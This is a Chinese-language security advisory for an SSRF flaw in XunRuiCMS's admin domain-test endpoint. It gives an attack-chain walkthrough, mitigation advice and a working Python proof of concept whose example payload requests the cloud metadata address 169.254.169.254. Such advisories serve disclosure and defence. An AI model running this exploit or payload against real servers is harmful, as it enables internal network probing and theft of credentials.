CVE-2025-14008 | XunRuiCMS 服务器端请求伪造漏洞（SSRF）

漏洞信息

漏洞编号

CVE-2025-14008

漏洞类型

服务器端请求伪造（SSRF）

CVSS评分

4.7 中危

攻击向量

网络 (AV:N)

认证要求

高权限 (PR:H)

用户交互

无需交互 (UI:N)

影响产品

dayrui XunRuiCMS

漏洞概述

CVE-2025-14008是dayrui XunRuiCMS中存在的一个服务器端请求伪造（SSRF）漏洞。该漏洞存在于管理后台的项目域名变更测试功能中，具体位于admin79f2ec220c7e.php文件，攻击者可通过操控参数v发起SSRF攻击。漏洞影响XunRuiCMS 4.7.1及以下版本，CVSS评分4.7，属于中危级别。由于该漏洞需要高权限认证才能利用，攻击者需要先获取管理员账号权限。漏洞利用代码已公开，厂商在收到安全通知后未做出任何回应。由于XunRuiCMS是国内常用的CMS系统，该漏洞可能影响大量使用该系统的网站。攻击者成功利用此漏洞可对内网资源进行探测、读取内部服务数据，甚至可能通过内网服务进一步扩大攻击面。

技术细节

该SSRF漏洞源于XunRuiCMS在处理test_site_domain接口时对用户输入缺乏有效验证。攻击者通过构造恶意的URL参数v，诱使服务器向任意指定地址发起HTTP请求。漏洞存在于管理后台的API接口中，虽然需要高权限才能访问，但管理员账号一旦被攻破，攻击者即可利用此漏洞进行内网探测。CVSS向量显示攻击复杂度为低（AC:L），攻击者可远程利用（AV:N），无需用户交互（UI:N）。由于参数v未经过严格过滤，攻击者可利用file://、dict://、gopher://等协议进行更复杂的攻击，甚至尝试读取本地文件或探测内网服务。该漏洞的机密性、完整性和可用性影响均为低级别，但结合内网环境可能造成更严重的后果。攻击者通常利用SSRF漏洞作为内网渗透的入口点，通过探测内部服务发现更多可利用的目标。

攻击链分析

STEP 1

步骤1

攻击者获取XunRuiCMS管理员账号权限（通过社会工程学、密码爆破或其他漏洞）

STEP 2

步骤2

登录管理后台，访问admin79f2ec220c7e.php?c=api&m=test_site_domain端点

STEP 3

步骤3

构造恶意请求，在参数v中注入SSRF payload（如内网IP、file://协议等）

STEP 4

步骤4

服务器解析请求时，未验证参数v就直接发起HTTP请求到攻击者指定的目标

STEP 5

步骤5

攻击者获取返回的响应内容，实现内网资源探测、敏感数据读取或进一步内网渗透

PoC / 利用代码

⚠️ 仅供安全研究

以下代码仅用于安全研究和授权测试，未经授权使用属于违法行为。

PoC

import requests
import sys

# CVE-2025-14008 PoC - SSRF in XunRuiCMS test_site_domain
# Target: dayrui XunRuiCMS <= 4.7.1
# Component: admin79f2ec220c7e.php?c=api&m=test_site_domain

def exploit_ssrf(target_url, payload_url):
    """
    Exploit SSRF vulnerability by sending crafted 'v' parameter
    
    Args:
        target_url: Base URL of the vulnerable XunRuiCMS installation
        payload_url: URL to request (e.g., internal service, file://, etc.)
    """
    # Construct the vulnerable endpoint
    endpoint = f"{target_url.rstrip('/')}/admin79f2ec220c7e.php"
    
    # Parameters for SSRF exploitation
    params = {
        'c': 'api',
        'm': 'test_site_domain',
        'v': payload_url  # Malicious payload - SSRF trigger
    }
    
    try:
        print(f"[*] Target: {target_url}")
        print(f"[*] Payload URL: {payload_url}")
        print(f"[*] Sending request...")
        
        # Send request with admin credentials (required)
        response = requests.get(endpoint, params=params, timeout=10)
        
        print(f"[+] Status Code: {response.status_code}")
        print(f"[+] Response Length: {len(response.text)}")
        
        if response.status_code == 200:
            print("[+] Request successful - SSRF vulnerability confirmed")
            print(f"[>] Response preview: {response.text[:500]}")
        else:
            print("[-] Request failed")
            
    except requests.exceptions.RequestException as e:
        print(f"[-] Error: {e}")

if __name__ == "__main__":
    if len(sys.argv) < 3:
        print("Usage: python cve-2025-14008.py <target_url> <payload_url>")
        print("Example: python cve-2025-14008.py http://target.com http://169.254.169.254/latest/meta-data/")
        sys.exit(1)
    
    target = sys.argv[1]
    payload = sys.argv[2]
    exploit_ssrf(target, payload)

影响范围

dayrui XunRuiCMS <= 4.7.1

防御指南

临时缓解措施

在官方修复补丁发布前，建议临时禁用或限制Project Domain Change Test功能的使用，关闭管理后台API接口的对外请求能力，配置网络访问控制列表（ACL）限制服务器仅能访问必要的外部资源，同时加强对管理员账号的安全防护，使用强密码并启用双因素认证。